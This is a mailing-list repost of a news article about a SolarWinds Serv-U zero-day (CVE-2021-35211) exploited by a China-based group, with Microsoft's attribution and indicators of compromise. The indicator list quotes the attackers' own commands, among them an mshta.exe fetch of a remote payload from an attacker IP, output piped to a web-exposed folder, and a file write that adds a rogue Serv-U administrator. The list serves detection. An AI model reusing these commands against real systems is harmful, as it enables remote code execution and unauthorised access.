[BreachExchange] SolarWinds 0-day gave Chinese hackers privileged access to customer servers

Sophia Kingsbury sophia.kingsbury at riskbasedsecurity.com
Wed Jul 14 11:26:28 EDT 2021 

https://arstechnica.com/gadgets/2021/07/microsoft-says-hackers-in-china-exploited-critical-solarwinds-0-day/

Microsoft said on Tuesday that hackers operating in China exploited a
zero-day vulnerability in a SolarWinds product. According to Microsoft, the
hackers were, in all likelihood, targeting software companies and the US
Defense industry.

SolarWinds disclosed the zero-day on Monday after receiving notification
from Microsoft that it had discovered that a previously unknown
vulnerability in the SolarWinds Serv-U product line was under active
exploit. Austin, Texas-based SolarWinds provided no details about the
threat actor behind the attacks or how their attack worked.

Commercial VPNs and compromised consumer routers

On Tuesday, Microsoft said it was designating the hacking group for now as
“DEV-0322.” “DEV” refers to a “development group” under study prior to when
Microsoft researchers have a high confidence about the origin or identity
of the actor behind an operation. The company said that the attackers are
physically located in China and often rely on botnets made up of routers or
other types of IoT devices.

“MSTIC has observed DEV-0322 targeting entities in the US Defense
Industrial Base Sector and software companies,” researchers with the
Microsoft Threat Intelligence Center wrote in a post. “This activity group
is based in China and has been observed using commercial VPN solutions and
compromised consumer routers in their attacker infrastructure.”

Beyond the three attacker-affiliated servers already disclosed by
SolarWinds, Microsoft provided three additional indicators that people can
use to determine if they were hacked. The indicators of compromise are:


   - 98[.]176[.]196[.]89
   - 68[.]235[.]178[.]32
   - 208[.]113[.]35[.]58
   - 144[.]34[.]179[.]162
   - 97[.]77[.]97[.]58
   - hxxp://144[.]34[.]179[.]162/a
   - C:\Windows\Temp\Serv-U.bat
   - C:\Windows\Temp\test\current.dmp
   - The presence of suspicious exception errors, particularly in the
   DebugSocketlog.txt log file
   - C:\Windows\System32\mshta.exe http://144[.]34[.]179[.]162/a (defanged)
   - cmd.exe /c whoami > “./Client/Common/redacted.txt”
   - cmd.exe /c dir > “.\Client\Common\redacted.txt”
   - cmd.exe /c “C:\Windows\Temp\Serv-U.bat”
   - powershell.exe C:\Windows\Temp\Serv-U.bat
   - cmd.exe /c type \\redacted\redacted.Archive >
   “C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\redacted.Archive”

Tuesday’s post also provided new technical details about the attack.
Specifically:

"We observed DEV-0322 piping the output of their cmd.exe commands to files
in the Serv-U \Client\Common\ folder, which is accessible from the internet
by default, so that the attackers could retrieve the results of the
commands. The actor was also found adding a new global user to Serv-U,
effectively adding themselves as a Serv-U administrator, by manually
creating a crafted .Archive file in the Global Users directory. Serv-U user
information is stored in these .Archive files.

Due to the way DEV-0322 had written their code, when the exploit
successfully compromises the Serv-U process, an exception is generated and
logged to a Serv-U log file, DebugSocketLog.txt. The process could also
crash after a malicious command was run.

By reviewing telemetry, we identified features of the exploit, but not a
root-cause vulnerability. MSTIC worked with the Microsoft Offensive
Security Research team, who performed vulnerability research on the Serv-U
binary and identified the vulnerability through black box analysis. Once a
root cause was found, we reported the vulnerability to SolarWinds, who
responded quickly to understand the issue and build a patch."

The zero-day vulnerability, which is tracked as CVE-2021-35211, resides in
SolarWinds’ Serv-U product, which customers use to transfer files across
networks. When the Serv-U SSH is exposed to the Internet, exploits give
attackers the ability to remotely run malicious code with high system
privileges. From there, attackers can install and run malicious payloads,
or they can view and change data.

SolarWinds became a household name overnight in late December when
researchers discovered it was at the center of a supply-chain attack with
global reach. After compromising SolarWinds’ software build system, the
attackers used their access to push a malicious update to roughly 18,000
customers of the company's Orion network management tool.

Of those 18,000 customers, about nine of them in US government agencies and
about 100 of them in private industry received follow-on malware. The
federal government has attributed the attacks to Russia’s Foreign
Intelligence Service, which is abbreviated as the SVR. For more than a
decade, the SVR has conducted malware campaigns targeting governments,
political think tanks, and other organizations around the world.

The zero-day attacks that Microsoft discovered and reported are unrelated
to the Orion supply chain attack.

SolarWinds patched the vulnerability over the weekend. Anyone running a
vulnerable version of Serv-U should update immediately and check for signs
of compromise.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.riskbasedsecurity.com/pipermail/breachexchange/attachments/20210714/4cd436d1/attachment.html>

More information about the BreachExchange mailing list